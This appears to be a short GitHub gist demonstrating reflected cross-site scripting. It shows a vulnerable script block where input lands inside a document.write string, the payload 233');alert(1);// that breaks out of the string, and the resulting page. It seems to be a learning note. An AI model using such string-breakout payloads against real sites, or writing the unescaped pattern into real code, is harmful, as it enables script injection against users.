Skip to content

Instantly share code, notes, and snippets.

@FernandoZhuang
Created June 14, 2018 06:07
Show Gist options
  • Save FernandoZhuang/ecf12c310efe62ac1d479e45217a0c96 to your computer and use it in GitHub Desktop.
Save FernandoZhuang/ecf12c310efe62ac1d479e45217a0c96 to your computer and use it in GitHub Desktop.
XssRefkectedCrossSite
<!--Vulnerbility注入点:
<label><h4>
<script type="text/javascript">
var you = 'iloveyou';
document.write('2333''+','+you);
</script>
</h4></label>
-->
<!--Inject输入: 233');alert(1);//'+','+you); -->
<label><h4>
<script type="text/javascript">
var you = 'iloveyou';
document.write('233');alert(1);//'+','+you);
</script>
</h4></label>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment